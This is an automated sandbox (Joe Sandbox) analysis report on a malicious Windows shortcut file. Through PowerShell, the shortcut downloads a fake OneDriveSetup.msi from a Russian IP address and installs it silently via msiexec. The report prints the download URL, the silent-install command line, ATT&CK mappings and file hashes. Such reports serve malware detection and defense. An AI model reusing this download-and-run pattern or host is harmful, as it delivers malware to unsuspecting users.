Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F14D9C rdtsc 0_2_00007FF848F14D9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4020Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5803Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000000.00000002.2137428406.0000024D71C78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F14D9C rdtsc 0_2_00007FF848F14D9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\Install.msi /qnJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell
1
DLL Side-Loading
11
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1606491 Sample: GIjkGXNvza.lnk Startdate: 04/02/2025 Architecture: WINDOWS Score: 72 17 Windows shortcut file (LNK) starts blacklisted processes 2->17 19 Multi AV Scanner detection for submitted file 2->19 21 Suspicious powershell command line found 2->21 23 3 other signatures 2->23 6 powershell.exe 14 19 2->6         started        9 msiexec.exe 2->9         started        process3 dnsIp4 15 5.45.94.186, 49704, 49705, 80 SERVERIUS-ASNL Russian Federation 6->15 11 conhost.exe 1 6->11         started        13 msiexec.exe 6->13         started        process5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
GIjkGXNvza.lnk40%VirustotalBrowse
GIjkGXNvza.lnk29%ReversingLabsWin32.Trojan.Boxter
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://5.45.94.186/download/OneDriveSetup.msi0%Avira URL Cloudsafe
http://5.45.94.186/download/OneDriveSetup.msi-OutFileC:0%Avira URL Cloudsafe
http://5.45.94.186/download/OneDriveSetup.msiM0%Avira URL Cloudsafe
http://5.45.94.1860%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://5.45.94.186/download/OneDriveSetup.msitrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2109693324.0000024D5B150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpfalse
    high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://go.micropowershell.exe, 00000000.00000002.2109693324.0000024D5A93B000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://5.45.94.186/download/OneDriveSetup.msi-OutFileC:powershell.exe, 00000000.00000002.2109536061.0000024D57B20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2137428406.0000024D71C12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D57792000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109473710.0000024D579E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2137428406.0000024D71C86000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577F7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://contoso.com/powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2109693324.0000024D5B150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Iconpowershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.2109693324.0000024D597E1000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2109693324.0000024D597E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://5.45.94.186powershell.exe, 00000000.00000002.2109693324.0000024D5ADB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109693324.0000024D5A93B000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://5.45.94.186/download/onedrivesetup.msipowershell.exe, 00000000.00000002.2109536061.0000024D57B25000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://5.45.94.186/download/OneDriveSetup.msiMpowershell.exe, 00000000.00000002.2109165267.0000024D57862000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          5.45.94.186
                          unknownRussian Federation
                          50673SERVERIUS-ASNLtrue
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1606491
                          Start date and time:2025-02-04 14:18:28 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:7
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:GIjkGXNvza.lnk
                          renamed because original name is a hash value
                          Original Sample Name:14d22921b1d69f92edd0bd8e2c8670bb65255cb9ca7cba185ad67ff03d27067b.lnk
                          Detection:MAL
                          Classification:mal72.winLNK@5/5@0/1
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 2
                          • Number of non-executed functions: 1
                          Cookbook Comments:
                          • Found application associated with file extension: .lnk
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.253.45
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target powershell.exe, PID 7264 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          TimeTypeDescription
                          08:19:22API Interceptor41x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          5.45.94.186DuAmp0SVGi.lnkGet hashmaliciousUnknownBrowse
                          • 5.45.94.186/download/OneDriveSetup.msi
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          SERVERIUS-ASNLDuAmp0SVGi.lnkGet hashmaliciousUnknownBrowse
                          • 5.45.94.186
                          nabsh4.elfGet hashmaliciousUnknownBrowse
                          • 141.98.49.240
                          https://era-info.com/gt/Get hashmaliciousUnknownBrowse
                          • 5.255.81.100
                          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                          • 178.21.23.182
                          https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                          • 178.21.23.181
                          https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                          • 178.21.23.181
                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          • 141.98.34.116
                          https://maya-lopez.filemail.com/t/BLFGBJSQGet hashmaliciousHTMLPhisherBrowse
                          • 178.21.23.181
                          7kTWRqwrXx.exeGet hashmaliciousRemcosBrowse
                          • 5.45.79.50
                          spc.elfGet hashmaliciousMirai, MoobotBrowse
                          • 91.205.192.9
                          No context
                          No context
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1940658735648508
                          Encrypted:false
                          SSDEEP:3:Nlllulbnolz:NllUc
                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:@...e................................................@..........
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4553
                          Entropy (8bit):3.784968072275858
                          Encrypted:false
                          SSDEEP:48:7PNOn6IDttk5n15LlzaSogZoktLHsHbE5n15LlIaSogZoktLHsH31:7PK6am515LdH/LM4515LYH/LMl
                          MD5:AE78BE0659C134CB2077A8446F8CE3B8
                          SHA1:F730D2D3E345CE8DFD9B3F50AD38728461DF9E73
                          SHA-256:4DE959D4FB2E50D46F74ACC62412905D9B456136A403B04BF2A0DDF6FEC17DDB
                          SHA-512:B5246EF25C61ED85F08C73152A231540D223540D28D60C89C360A545A25B7F1CD805223A9B0D34F065004AEFF061AFF279C7DADC1A9E9C08132A279A20A540EF
                          Malicious:false
                          Preview:...................................FL..................F. .. ...L.m.....k.f.w...#.e.w...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........6o.....k.f.w....j.2.....DZjj .GIJKGX~1.LNK..N......DW.rDZjj..........................l.,.G.I.j.k.G.X.N.v.z.a...l.n.k.......U...............-.......T............;.......C:\Users\user\Desktop\GIjkGXNvza.lnk..!.%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.`.......X.......506013...........hT..CrF.f4... ..x2=.b...,...W..hT..CrF.f4... ..x2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwHDZjj....3.........................W.i.n.d.o.w.s.....Z.1.....DZgj..System32..B......OwHDZhj........................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4553
                          Entropy (8bit):3.784968072275858
                          Encrypted:false
                          SSDEEP:48:7PNOn6IDttk5n15LlzaSogZoktLHsHbE5n15LlIaSogZoktLHsH31:7PK6am515LdH/LM4515LYH/LMl
                          MD5:AE78BE0659C134CB2077A8446F8CE3B8
                          SHA1:F730D2D3E345CE8DFD9B3F50AD38728461DF9E73
                          SHA-256:4DE959D4FB2E50D46F74ACC62412905D9B456136A403B04BF2A0DDF6FEC17DDB
                          SHA-512:B5246EF25C61ED85F08C73152A231540D223540D28D60C89C360A545A25B7F1CD805223A9B0D34F065004AEFF061AFF279C7DADC1A9E9C08132A279A20A540EF
                          Malicious:false
                          Preview:...................................FL..................F. .. ...L.m.....k.f.w...#.e.w...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......O........6o.....k.f.w....j.2.....DZjj .GIJKGX~1.LNK..N......DW.rDZjj..........................l.,.G.I.j.k.G.X.N.v.z.a...l.n.k.......U...............-.......T............;.......C:\Users\user\Desktop\GIjkGXNvza.lnk..!.%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.S.H.E.L.L.3.2...d.l.l.`.......X.......506013...........hT..CrF.f4... ..x2=.b...,...W..hT..CrF.f4... ..x2=.b...,...W.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z.....3........"KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....DW.r..Windows.@......OwHDZjj....3.........................W.i.n.d.o.w.s.....Z.1.....DZgj..System32..B......OwHDZhj........................
                          File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Working directory, Has command line arguments, Icon number=238, Archive, ctime=Thu Jul 26 00:26:44 2012, mtime=Thu Jul 26 00:26:44 2012, atime=Thu Jul 26 02:20:50 2012, length=454656, window=hide
